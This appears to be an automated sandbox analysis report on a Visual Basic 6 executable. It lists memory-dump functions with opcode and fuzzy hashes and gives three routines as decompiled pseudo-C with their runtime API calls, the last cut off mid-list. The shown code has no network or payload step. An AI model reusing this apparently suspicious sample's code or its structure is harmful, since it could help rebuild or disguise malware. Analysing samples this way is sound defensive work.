Function 022925BD, Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1738300615.0000000002290000.00000040.00000001.sdmp, Offset: 02290000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d72aff506e4ca1d6a5bddb02c5c217702ec1aa763d0656ff7826f45f70f92251
Instruction ID: f34702113c5a54dc60efafdcfe5a2e5f714ef44a4b3eb56b72cb6723e0398240
Opcode Fuzzy Hash: d72aff506e4ca1d6a5bddb02c5c217702ec1aa763d0656ff7826f45f70f92251
Instruction Fuzzy Hash: 66218B716B9344AAEF305EE0C928BD877A3AF42710F15819DDC425F5DAC7F18548D706

Uniqueness

Uniqueness Score: -1.00%

Function 02290162, Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1738300615.0000000002290000.00000040.00000001.sdmp, Offset: 02290000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91689091fc64cd5e2590b625770a724e84e7e73a76b7d910000020ef4466e2ed
Instruction ID: 057c78a898c2c19fc3877f31746eff713cc86823de2be5d0c15b92b460aa08ec
Opcode Fuzzy Hash: 91689091fc64cd5e2590b625770a724e84e7e73a76b7d910000020ef4466e2ed
Instruction Fuzzy Hash: B8218EE7D6E7D84197225DF4C31C19AFF570A93024729C5DE88834EA5BEAD18209F34E

Uniqueness

Uniqueness Score: -1.00%

Function 02293519, Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1738300615.0000000002290000.00000040.00000001.sdmp, Offset: 02290000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 511daeca6739e54bd54d2dde6de96187a52af0cd0c0741d4bea74fd862d699a0
Instruction ID: 50617c075b187dbc1623f311dcbb9a4b1d7a3b6c87af5635782b62c158d354fd
Opcode Fuzzy Hash: 511daeca6739e54bd54d2dde6de96187a52af0cd0c0741d4bea74fd862d699a0
Instruction Fuzzy Hash: 16217FA6A6E3D409DB328AF4C52C1D9BF570E8713471985CEC4824E95BDAD1410AF35E

Uniqueness

Uniqueness Score: -1.00%

Function 022957BD, Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1738300615.0000000002290000.00000040.00000001.sdmp, Offset: 02290000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4baf8f55fc63d784f84d73870c9e55eed9081d79d34f907f3375af7b24b9d71
Instruction ID: 13a443cc73de60accaa1f9349e6fab5625e9ed0009d8f6a2d5dba55653ee0c91
Opcode Fuzzy Hash: d4baf8f55fc63d784f84d73870c9e55eed9081d79d34f907f3375af7b24b9d71
Instruction Fuzzy Hash: DC11C6E795F6D50193219EF4C218049EF670A93024329899E40824DE97DDE18119B34D

Uniqueness

Uniqueness Score: -1.00%

Function 02295AD9, Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1738300615.0000000002290000.00000040.00000001.sdmp, Offset: 02290000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d450882215ec2654441bfc7816b47b1fcc943263d1982099e5d0a57b9b7ca35b
Instruction ID: 2198646aa44d2c0805f25f35ad46c371c585a6f760ec2e14217e100cc4c82643
Opcode Fuzzy Hash: d450882215ec2654441bfc7816b47b1fcc943263d1982099e5d0a57b9b7ca35b
Instruction Fuzzy Hash: 560121E7A6F7D84097224DF4C22C09ABF9B099303436985DE80834DA5BDAD1420AF34E

Uniqueness

Uniqueness Score: -1.00%

Function 02295E33, Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1738300615.0000000002290000.00000040.00000001.sdmp, Offset: 02290000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5335500396cfca7b2514431bb5b46845aafdce11de7159ec1f9be21951b2aaa5
Instruction ID: 68ad1c35bbddb57593e470e4933e0a1fdc501782114d73143cd1a52490361040
Opcode Fuzzy Hash: 5335500396cfca7b2514431bb5b46845aafdce11de7159ec1f9be21951b2aaa5
Instruction Fuzzy Hash: 3A01DEF7A6F7D401933649F4C258149AF5B069313472985EE80838EA97DDE2410AF34D

Uniqueness

Uniqueness Score: -1.00%

Function 02290252, Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1738300615.0000000002290000.00000040.00000001.sdmp, Offset: 02290000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b548976c0247d77d52ddd32c0a51f48616e8cb96cc5f92e9a18ccb6d6f34ef20
Instruction ID: ea60a2f9c87cce14e39b933e871f2d9d82ea3f2d92f507ed8954c83abaa4ee01
Opcode Fuzzy Hash: b548976c0247d77d52ddd32c0a51f48616e8cb96cc5f92e9a18ccb6d6f34ef20
Instruction Fuzzy Hash: E40151E7D6E7D84097215DF4C31C199BB570AD3134739869D44434DA9BDED18209F38E

Uniqueness

Uniqueness Score: -1.00%

Function 02295C81, Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1738300615.0000000002290000.00000040.00000001.sdmp, Offset: 02290000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 158235c17c682512d160ac7239a0849f9ac799f2b24a8b0af961c2d6d7171bee
Instruction ID: 51d4eba0154a637452beb1bacb63a6e2ff4f2c45b3e832b4cdb1d5701c0eba17
Opcode Fuzzy Hash: 158235c17c682512d160ac7239a0849f9ac799f2b24a8b0af961c2d6d7171bee
Instruction Fuzzy Hash: DB01C0E6A6F7D405D7228AF8C22C199BFA70B9312476DC5EE80424EA5BDAD14109F34E

Uniqueness

Uniqueness Score: -1.00%

Function 02295F31, Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1738300615.0000000002290000.00000040.00000001.sdmp, Offset: 02290000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c49db8b58b447bbac18b20eceb8a205200949281f3e3c9f87eed323421dd233a
Instruction ID: 55c55f6822ee1734818d8efc0aa8968f08a4e7c67b0f485ef3ae466f10c12f25
Opcode Fuzzy Hash: c49db8b58b447bbac18b20eceb8a205200949281f3e3c9f87eed323421dd233a
Instruction Fuzzy Hash: 01011CE7E5E7D40097314DF4C22818EFBA75AE7134729C99D80434DB9BEAE1410AB38D

Uniqueness

Uniqueness Score: -1.00%

Function 022928F4, Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1738300615.0000000002290000.00000040.00000001.sdmp, Offset: 02290000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6637fd7667764862dbea3498a0178e8da068345744d6f954098a469a4b83ef9e
Instruction ID: 231daaf1c80408a245c411fb53326cc5e7813d3b758d0c02d1618b005fc5bb4e
Opcode Fuzzy Hash: 6637fd7667764862dbea3498a0178e8da068345744d6f954098a469a4b83ef9e
Instruction Fuzzy Hash: 68019E71624743DFEF759EB884C07907691EB52224F5883A8C8CA8B68EE7648886C741

Uniqueness

Uniqueness Score: -1.00%

Function 0229613B, Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1738300615.0000000002290000.00000040.00000001.sdmp, Offset: 02290000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5dc6b02b127978c57642a3478e9540762ffea5ec9f25cbb00ec9ce003d32981a
Instruction ID: cf6fb85f12dffb44141c3c3fafb04694509cf019462f16d1410e52e9df523360
Opcode Fuzzy Hash: 5dc6b02b127978c57642a3478e9540762ffea5ec9f25cbb00ec9ce003d32981a
Instruction Fuzzy Hash: 3BF0E9EB95FAD405532189B4C32C089BBAB55D312433E85DE84438EBA7D9D1510EF78E

Uniqueness

Uniqueness Score: -1.00%

Function 0229322E, Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1738300615.0000000002290000.00000040.00000001.sdmp, Offset: 02290000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a65d922d2f4cb5db8c8faa924c104815059065bafab0cc5ed211b728b0d29545
Instruction ID: fd0775072c2f4e1d5b92243e1ff0d0cb9913589e6b3cbb1dec85625e0a52b51d
Opcode Fuzzy Hash: a65d922d2f4cb5db8c8faa924c104815059065bafab0cc5ed211b728b0d29545
Instruction Fuzzy Hash: 5BF09C39520385EBEF396EE09C017F83623FF55350F8C4104EE8916118C7B74A909F41

Uniqueness

Uniqueness Score: -1.00%

Function 02296AA6, Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1738300615.0000000002290000.00000040.00000001.sdmp, Offset: 02290000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb31557e0d31f22074e84cabfcc5fc5ff9b8825b76cf7c4ad74e699c39c519ec
Instruction ID: fc6c90b05fb154d1e2fb9ada4c0ed26c5a39f1bc8bf3f9c6ef9652c76c2c36c3
Opcode Fuzzy Hash: fb31557e0d31f22074e84cabfcc5fc5ff9b8825b76cf7c4ad74e699c39c519ec
Instruction Fuzzy Hash: 96F05E723203018FCB14DE98C1F4FBA73EEAFA5795F15C465E886DB228E724D844CA11

Uniqueness

Uniqueness Score: -1.00%

Function 022960A6, Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1738300615.0000000002290000.00000040.00000001.sdmp, Offset: 02290000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e90f1f813ae2af98e877ed89c9c5295d57a825d55265780db2940012d84c78c
Instruction ID: 75ca24bc2d15e8a4b95f4b66e706321a508679bdb8d002983628dadb65e930af
Opcode Fuzzy Hash: 9e90f1f813ae2af98e877ed89c9c5295d57a825d55265780db2940012d84c78c
Instruction Fuzzy Hash: 7CF030F6A6E7C44687218EB4C318449BBA74B9306872985DD80434FB57DAD1C109F74D

Uniqueness

Uniqueness Score: -1.00%

Function 022960A4, Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1738300615.0000000002290000.00000040.00000001.sdmp, Offset: 02290000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bcda5af2f7b16e0df498e7713b79aec9af8bcc7d76ab6420f26319538e7cab8
Instruction ID: 0c4656bd6f02ba2fcbf615e2f249af621a5a105704a043ce8291db0cfda0d156
Opcode Fuzzy Hash: 5bcda5af2f7b16e0df498e7713b79aec9af8bcc7d76ab6420f26319538e7cab8
Instruction Fuzzy Hash: 41C00235639640CBCE598A48D2A0EB573F8AB156C0F250494E8479BA2AD394D804CA01

Uniqueness

Uniqueness Score: -1.00%

Function 02293653, Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1738300615.0000000002290000.00000040.00000001.sdmp, Offset: 02290000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1e932aa7c74629d93b0aa55caf6229b4a178acafacf318dc74ff8116ea7a254
Instruction ID: 7062146054ac615165ff583afb48ad93f4cc3ef590dcaea837cdeadbb45fa529
Opcode Fuzzy Hash: e1e932aa7c74629d93b0aa55caf6229b4a178acafacf318dc74ff8116ea7a254
Instruction Fuzzy Hash: 5BC048B6620581CFEF46DA08C581B5073B0AB58788B0908D0E402CB652C224E900CA04

Uniqueness

Uniqueness Score: -1.00%

Function 004129C5, Relevance: 33.2, APIs: 22, Instructions: 168
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E004129C5(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v36;
				void* _v52;
				char _v56;
				long long _v64;
				char _v72;
				char _v88;
				char _v104;
				char _v120;
				intOrPtr _v144;
				char _v152;
				intOrPtr _v160;
				char _v168;
				void* _v172;
				short _v176;
				signed int _v180;
				short _v184;
				intOrPtr* _v192;
				signed int _v196;
				char* _t72;
				signed int _t76;
				char* _t78;
				char* _t83;
				short _t87;
				char* _t94;
				short _t98;
				intOrPtr _t120;
				char* _t126;

				_push(0x4011d6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t120;
				L004011D0();
				_v12 = _t120;
				_v8 = 0x4011b8;
				L004012CC();
				if( *0x414010 != 0) {
					_v192 = 0x414010;
				} else {
					_push(0x414010);
					_push(0x402bc0);
					L0040132C();
					_v192 = 0x414010;
				}
				_t72 =  &_v56;
				L00401332();
				_v176 = _t72;
				_t76 =  *((intOrPtr*)( *_v176 + 0x1c0))(_v176,  &_v172, _t72,  *((intOrPtr*)( *((intOrPtr*)( *_v192)) + 0x300))( *_v192));
				asm("fclex");
				_v180 = _t76;
				if(_v180 >= 0) {
					_v196 = _v196 & 0x00000000;
				} else {
					_push(0x1c0);
					_push(0x40274c);
					_push(_v176);
					_push(_v180);
					L00401326();
					_v196 = _t76;
				}
				_v64 = _v172;
				_v72 = 3;
				_t78 =  &_v72;
				_push(_t78);
				L0040127E();
				asm("sbb eax, eax");
				_v184 =  ~( ~(_t78 - 0xffff) + 1);
				L00401320();
				L0040131A();
				_t83 = _v184;
				if(_t83 != 0) {
					_v64 =  *0x4011b0;
					_v72 = 5;
					_push(0);
					_push( &_v72);
					_push( &_v88);
					L00401278();
					_v160 = 1;
					_v168 = 0x8002;
					_push( &_v88);
					_t87 =  &_v168;
					_push(_t87);
					L004012A8();
					_v176 = _t87;
					_push( &_v88);
					_push( &_v72);
					_push(2);
					L004012FC();
					_t83 = _v176;
					_t126 = _t83;
					if(_t126 != 0) {
						_push(0x40297c);
						L00401272();
						asm("fcomp dword [0x4011a8]");
						asm("fnstsw ax");
						asm("sahf");
						if(_t126 == 0) {
							_push( &_v72);
							L0040126C();
							_push( &_v88);
							L0040126C();
							_v144 = 1;
							_v152 = 2;
							_push(1);
							_push(1);
							_push( &_v88);
							_push( &_v152);
							_t94 =  &_v104;
							_push(_t94);
							L00401260();
							_push(_t94);
							_push( &_v72);
							_push(0x402984);
							_push( &_v120);
							L00401266();
							_v160 = 1;
							_v168 = 0x8002;
							_push( &_v120);
							_t98 =  &_v168;
							_push(_t98);
							L004012A8();
							_v176 = _t98;
							_push( &_v120);
							_push( &_v104);
							_push( &_v72);
							_push( &_v88);
							_push(4);
							L004012FC();
							_t83 = _v176;
							if(_t83 != 0) {
								_t83 =  &_v72;
								_push(_t83);
								L00401296();
								L0040129C();
							}
						}
					}
				}
				asm("wait");
				_push(0x412c73);
				L0040131A();
				L0040131A();
				return _t83;
			}

0x004129ca
0x004129d5
0x004129d6
0x004129e2
0x004129ea
0x004129ed
0x004129fa
0x00412a06
0x00412a23
0x00412a08
0x00412a08
0x00412a0d
0x00412a12
0x00412a17
0x00412a17
0x00412a47
0x00412a4b
0x00412a50
0x00412a6b
0x00412a71
0x00412a73
0x00412a80
0x00412aa5
0x00412a82
0x00412a82
0x00412a87
0x00412a8c
0x00412a92
0x00412a98
0x00412a9d
0x00412a9d
0x00412ab2
0x00412ab5
0x00412abc
0x00412abf
0x00412ac0
0x00412acc
0x00412ad1
0x00412adb
0x00412ae3
0x00412ae8
0x00412af1
0x00412afd
0x00412b00
0x00412b07
0x00412b0c
0x00412b10
0x00412b11
0x00412b16
0x00412b20
0x00412b2d
0x00412b2e
0x00412b34
0x00412b35
0x00412b3a
0x00412b44
0x00412b48
0x00412b49
0x00412b4b
0x00412b53
0x00412b5a
0x00412b5c
0x00412b62
0x00412b67
0x00412b6c
0x00412b72
0x00412b74
0x00412b75
0x00412b7e
0x00412b7f
0x00412b87
0x00412b88
0x00412b8d
0x00412b97
0x00412ba1
0x00412ba3
0x00412ba8
0x00412baf
0x00412bb0
0x00412bb3
0x00412bb4
0x00412bb9
0x00412bbd
0x00412bbe
0x00412bc6
0x00412bc7
0x00412bcc
0x00412bd6
0x00412be3
0x00412be4
0x00412bea
0x00412beb
0x00412bf0
0x00412bfa
0x00412bfe
0x00412c02
0x00412c06
0x00412c07
0x00412c09
0x00412c11
0x00412c1a
0x00412c1c
0x00412c1f
0x00412c20
0x00412c2b
0x00412c2b
0x00412c1a
0x00412b75
0x00412b5c
0x00412c30
0x00412c31
0x00412c65
0x00412c6d
0x00412c72

APIs

__vbaChkstk.MSVBVM60(?,004011D6), ref: 004129E2
__vbaVarDup.MSVBVM60(?,?,?,?,004011D6), ref: 004129FA
__vbaNew2.MSVBVM60(00402BC0,00414010,?,?,?,?,004011D6), ref: 00412A12
__vbaObjSet.MSVBVM60(?,00000000), ref: 00412A4B
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040274C,000001C0), ref: 00412A98
#561.MSVBVM60(00000003), ref: 00412AC0
__vbaFreeObj.MSVBVM60(00000003), ref: 00412ADB
__vbaFreeVar.MSVBVM60(00000003), ref: 00412AE3
#714.MSVBVM60(?,00000005,00000000,00000003), ref: 00412B11
__vbaVarTstEq.MSVBVM60(00008002,?,?,00000005,00000000,00000003), ref: 00412B35
__vbaFreeVarList.MSVBVM60(00000002,00000005,?,00008002,?,?,00000005,00000000,00000003), ref: 00412B4B
__vbaR4Str.MSVBVM60(0040297C), ref: 00412B67
#610.MSVBVM60(?,0040297C), ref: 00412B7F
#610.MSVBVM60(?,?,0040297C), ref: 00412B88
__vbaVarAdd.MSVBVM60(?,00000002,?,00000001,00000001), ref: 00412BB4
#662.MSVBVM60(?,00402984,?,00000000,?,00000002,?,00000001,00000001), ref: 00412BC7
__vbaVarTstEq.MSVBVM60(00008002,?,?,00402984,?,00000000,?,00000002,?,00000001,00000001), ref: 00412BEB
__vbaFreeVarList.MSVBVM60(00000004,?,?,?,?,00008002,?,?,00402984,?,00000000,?,00000002,?,00000001,00000001), ref: 00412C09
#546.MSVBVM60(?,?,?,?,?,0040297C), ref: 00412C20
__vbaVarMove.MSVBVM60(?,?,?,?,?,0040297C), ref: 00412C2B
__vbaFreeVar.MSVBVM60(00412C73,00000003), ref: 00412C65
__vbaFreeVar.MSVBVM60(00412C73,00000003), ref: 00412C6D

Memory Dump Source

Source File: 00000000.00000002.1737108122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1737093572.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1737190061.0000000000414000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1737310362.0000000000416000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$#610List$#546#561#662#714CheckChkstkHresultMoveNew2
String ID:
API String ID: 3512411045-0
Opcode ID: 94049810d542a7c07f68c6fe72eef7285023ebf81a3f0b561de5fc43b5e4081e
Instruction ID: 3c1e4ad366cc999be54dca3746ec5b128ea78787101109492d7a3f5cdaf7b1e4
Opcode Fuzzy Hash: 94049810d542a7c07f68c6fe72eef7285023ebf81a3f0b561de5fc43b5e4081e
Instruction Fuzzy Hash: 98610C7191021CEADB10DFA1CE45FDEB7B8BF08704F1041ABA505F7191EB786A488F69

Uniqueness

Uniqueness Score: -1.00%

Function 004126B6, Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 165
COMMON

Download Yara Rule

C-Code - Quality: 51%

			E004126B6(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a12, void* _a16, void* _a48) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v40;
				void* _v56;
				void* _v60;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				signed int _v92;
				signed int _v96;
				intOrPtr* _v100;
				signed int _v104;
				intOrPtr* _v108;
				signed int _v112;
				signed int _v124;
				intOrPtr* _v128;
				signed int _v132;
				intOrPtr* _v136;
				signed int _v140;
				signed int _v144;
				signed int _t87;
				signed int _t91;
				signed int _t95;
				signed int _t101;
				signed int _t106;
				void* _t125;
				void* _t127;
				intOrPtr _t128;
				signed int _t131;

				_t128 = _t127 - 0xc;
				 *[fs:0x0] = _t128;
				L004011D0();
				_v16 = _t128;
				_v12 = 0x401188;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x78,  *[fs:0x0], 0x4011d6, _t125);
				L00401308();
				L004012CC();
				L004012CC();
				_t87 =  *((intOrPtr*)( *_a4 + 0xb0))(_a4,  &_v88);
				asm("fclex");
				_v92 = _t87;
				_t131 = _v92;
				if(_t131 >= 0) {
					_v124 = _v124 & 0x00000000;
				} else {
					_push(0xb0);
					_push(0x402460);
					_push(_a4);
					_push(_v92);
					L00401326();
					_v124 = _t87;
				}
				asm("fcomp dword [0x401180]");
				asm("fnstsw ax");
				asm("sahf");
				if(_t131 == 0) {
					if( *0x414010 != 0) {
						_v128 = 0x414010;
					} else {
						_push(0x414010);
						_push(0x402bc0);
						L0040132C();
						_v128 = 0x414010;
					}
					_t91 =  &_v80;
					L00401332();
					_v92 = _t91;
					_t95 =  *((intOrPtr*)( *_v92 + 0x158))(_v92,  &_v72, _t91,  *((intOrPtr*)( *((intOrPtr*)( *_v128)) + 0x2fc))( *_v128));
					asm("fclex");
					_v96 = _t95;
					if(_v96 >= 0) {
						_v132 = _v132 & 0x00000000;
					} else {
						_push(0x158);
						_push(0x40274c);
						_push(_v92);
						_push(_v96);
						L00401326();
						_v132 = _t95;
					}
					if( *0x41433c != 0) {
						_v136 = 0x41433c;
					} else {
						_push(0x41433c);
						_push(0x402818);
						L0040132C();
						_v136 = 0x41433c;
					}
					_v100 =  *_v136;
					_t101 =  *((intOrPtr*)( *_v100 + 0x4c))(_v100,  &_v84);
					asm("fclex");
					_v104 = _t101;
					if(_v104 >= 0) {
						_v140 = _v140 & 0x00000000;
					} else {
						_push(0x4c);
						_push(0x402808);
						_push(_v100);
						_push(_v104);
						L00401326();
						_v140 = _t101;
					}
					_v108 = _v84;
					_t106 =  *((intOrPtr*)( *_v108 + 0x24))(_v108, _v72, L"DOMNENAVNENES",  &_v76);
					asm("fclex");
					_v112 = _t106;
					if(_v112 >= 0) {
						_v144 = _v144 & 0x00000000;
					} else {
						_push(0x24);
						_push(0x402968);
						_push(_v108);
						_push(_v112);
						L00401326();
						_v144 = _t106;
					}
					_push( &_v76);
					_push( &_v72);
					_push(2);
					L00401314();
					_push( &_v84);
					_t87 =  &_v80;
					_push(_t87);
					_push(2);
					L0040130E();
				}
				asm("wait");
				_push(0x41290e);
				L0040131A();
				L0040131A();
				L00401302();
				return _t87;
			}

0x004126b9
0x004126c8
0x004126d2
0x004126da
0x004126dd
0x004126e4
0x004126f3
0x004126fc
0x00412707
0x00412712
0x00412723
0x00412729
0x0041272b
0x0041272e
0x00412732
0x0041274e
0x00412734
0x00412734
0x00412739
0x0041273e
0x00412741
0x00412744
0x00412749
0x00412749
0x00412755
0x0041275b
0x0041275d
0x0041275e
0x0041276b
0x00412785
0x0041276d
0x0041276d
0x00412772
0x00412777
0x0041277c
0x0041277c
0x004127a0
0x004127a4
0x004127a9
0x004127b8
0x004127be
0x004127c0
0x004127c7
0x004127e3
0x004127c9
0x004127c9
0x004127ce
0x004127d3
0x004127d6
0x004127d9
0x004127de
0x004127de
0x004127ee
0x0041280b
0x004127f0
0x004127f0
0x004127f5
0x004127fa
0x004127ff
0x004127ff
0x0041281d
0x0041282c
0x0041282f
0x00412831
0x00412838
0x00412854
0x0041283a
0x0041283a
0x0041283c
0x00412841
0x00412844
0x00412847
0x0041284c
0x0041284c
0x0041285e
0x00412875
0x00412878
0x0041287a
0x00412881
0x0041289d
0x00412883
0x00412883
0x00412885
0x0041288a
0x0041288d
0x00412890
0x00412895
0x00412895
0x004128a7
0x004128ab
0x004128ac
0x004128ae
0x004128b9
0x004128ba
0x004128bd
0x004128be
0x004128c0
0x004128c5
0x004128c8
0x004128c9
0x004128f8
0x00412900
0x00412908
0x0041290d

APIs

__vbaChkstk.MSVBVM60(?,004011D6), ref: 004126D2
__vbaStrCopy.MSVBVM60(?,?,?,?,004011D6), ref: 004126FC
__vbaVarDup.MSVBVM60(?,?,?,?,004011D6), ref: 00412707
__vbaVarDup.MSVBVM60(?,?,?,?,004011D6), ref: 00412712
__vbaHresultCheckObj.MSVBVM60(00000000,00401188,00402460,000000B0), ref: 00412744
__vbaNew2.MSVBVM60(00402BC0,00414010), ref: 00412777
__vbaObjSet.MSVBVM60(?,00000000), ref: 004127A4
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040274C,00000158), ref: 004127D9
__vbaNew2.MSVBVM60(00402818,0041433C), ref: 004127FA
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402808,0000004C), ref: 00412847
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402968,00000024), ref: 00412890
__vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 004128AE
__vbaFreeObjList.MSVBVM60(00000002,?,?,?,?,004011D6), ref: 004128C0
__vbaFreeVar.MSVBVM60(0041290E), ref: 004128F8
__vbaFreeVar.MSVBVM60(0041290E), ref: 00412900
__vbaFreeStr.MSVBVM60(0041290E), ref: 00412908

Strings

<CA, xrefs: 0041280B
DOMNENAVNENES, xrefs: 00412865

Memory Dump Source

Source File: 00000000.00000002.1737108122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1737093572.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1737190061.0000000000414000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1737310362.0000000000416000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresult$ListNew2$ChkstkCopy
String ID: <CA$DOMNENAVNENES
API String ID: 4201096553-3117400353
Opcode ID: fbe4aa098539d95aaa0ac5b2278235798f596306ab7e5c35d090b98cfe46879a
Instruction ID: 3bc30b2a934a3a1af669a6a97eecfef9a72f2a2978f95ee1c30ab7f098190a50
Opcode Fuzzy Hash: fbe4aa098539d95aaa0ac5b2278235798f596306ab7e5c35d090b98cfe46879a
Instruction Fuzzy Hash: 3F61E571900208EFDB10EFA5CA49BDDBBB4FF08304F10816AE905BB2A1D7B85995DF58

Uniqueness

Uniqueness Score: -1.00%

Function 004123A0, Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 108
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E004123A0(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v40;
				void* _v44;
				signed int _v52;
				void* _v56;
				char _v72;
				intOrPtr _v80;
				intOrPtr _v88;
				void* _v92;
				signed int _v96;
				intOrPtr* _v100;
				signed int _v104;
				intOrPtr _v116;
				char _v120;
				signed int _v124;
				signed int _v128;
				char* _t61;
				signed int _t66;
				signed int _t72;
				signed int _t77;
				void* _t91;
				void* _t93;
				intOrPtr _t94;

				_t94 = _t93 - 0xc;
				 *[fs:0x0] = _t94;
				L004011D0();
				_v16 = _t94;
				_v12 = 0x401160;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x68,  *[fs:0x0], 0x4011d6, _t91);
				L004012CC();
				_v80 = _a4;
				_v88 = 9;
				L004012CC();
				_t61 =  &_v72;
				_push(_t61);
				L00401290();
				asm("sbb eax, eax");
				_v92 =  ~( ~(_t61 - 0xffff) + 1);
				L0040131A();
				_t66 = _v92;
				if(_t66 != 0) {
					if( *0x41433c != 0) {
						_v120 = 0x41433c;
					} else {
						_push(0x41433c);
						_push(0x402818);
						L0040132C();
						_v120 = 0x41433c;
					}
					_t20 =  &_v120; // 0x41433c
					_v92 =  *((intOrPtr*)( *_t20));
					_t72 =  *((intOrPtr*)( *_v92 + 0x14))(_v92,  &_v56);
					asm("fclex");
					_v96 = _t72;
					if(_v96 >= 0) {
						_v124 = _v124 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x402808);
						_push(_v92);
						_push(_v96);
						L00401326();
						_v124 = _t72;
					}
					_v100 = _v56;
					_t77 =  *((intOrPtr*)( *_v100 + 0x58))(_v100,  &_v52);
					asm("fclex");
					_v104 = _t77;
					if(_v104 >= 0) {
						_v128 = _v128 & 0x00000000;
					} else {
						_push(0x58);
						_push(0x402828);
						_push(_v100);
						_push(_v104);
						L00401326();
						_v128 = _t77;
					}
					_t66 = _v52;
					_v116 = _t66;
					_v52 = _v52 & 0x00000000;
					L0040133E();
					L00401320();
				}
				asm("wait");
				_push(0x41251f);
				L0040131A();
				L00401302();
				return _t66;
			}

0x004123a3
0x004123b2
0x004123bc
0x004123c4
0x004123c7
0x004123ce
0x004123dd
0x004123e6
0x004123ee
0x004123f1
0x004123fe
0x00412403
0x00412406
0x00412407
0x00412413
0x00412418
0x0041241f
0x00412424
0x0041242a
0x00412437
0x00412451
0x00412439
0x00412439
0x0041243e
0x00412443
0x00412448
0x00412448
0x00412458
0x0041245d
0x0041246c
0x0041246f
0x00412471
0x00412478
0x00412491
0x0041247a
0x0041247a
0x0041247c
0x00412481
0x00412484
0x00412487
0x0041248c
0x0041248c
0x00412498
0x004124a7
0x004124aa
0x004124ac
0x004124b3
0x004124cc
0x004124b5
0x004124b5
0x004124b7
0x004124bc
0x004124bf
0x004124c2
0x004124c7
0x004124c7
0x004124d0
0x004124d3
0x004124d6
0x004124e0
0x004124e8
0x004124e8
0x004124ed
0x004124ee
0x00412511
0x00412519
0x0041251e

APIs

__vbaChkstk.MSVBVM60(?,004011D6), ref: 004123BC
__vbaVarDup.MSVBVM60(?,?,?,?,004011D6), ref: 004123E6
__vbaVarDup.MSVBVM60 ref: 004123FE
#562.MSVBVM60(?), ref: 00412407
__vbaFreeVar.MSVBVM60(?), ref: 0041241F
__vbaNew2.MSVBVM60(00402818,0041433C,?), ref: 00412443
